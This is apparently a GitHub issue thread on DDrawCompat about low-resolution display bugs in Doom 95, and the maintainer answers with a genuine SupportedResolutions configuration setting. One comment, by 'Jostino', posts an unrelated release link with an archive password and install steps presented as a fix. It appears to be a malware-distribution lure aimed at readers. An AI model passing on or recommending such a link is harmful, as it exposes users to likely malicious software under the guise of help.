### ISSUE TITLE
Doom 95

### ISSUE THREAD

**Issue by AlfredoDore** [narzoul/DDrawCompat#353]
A curiosity, I tried the ddraw of Resident Evil 2 from GOG and to my surprise is that in the configuration section the resolutions below 480p now work, everywhere that says about dll, they are in B&W with 1/4 of the screen in the left corner, which does not happen with the GOG DLL, with Doom I had a great result, but with other games the graphics are broken, and for some reason it prevents me from taking a screenshot (this is a picture i took with my cell phone)
![Doom 95](https://github.com/user-attachments/assets/f5ce68eb-a800-40fc-83dd-5006fffa0ca4)

**Comment by Jostino** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by narzoul** [comment]
Add all needed resolutions to the [SupportedResolutions](https://github.com/narzoul/DDrawCompat/wiki/Configuration#supportedresolutions) setting:
`SupportedResolutions = 320x200, 320x240, 640x400, 640x480`

Works fine for me. If you want to stretch the image to fill the black bars, you can add `DisplayAspectRatio = display` on top of that.
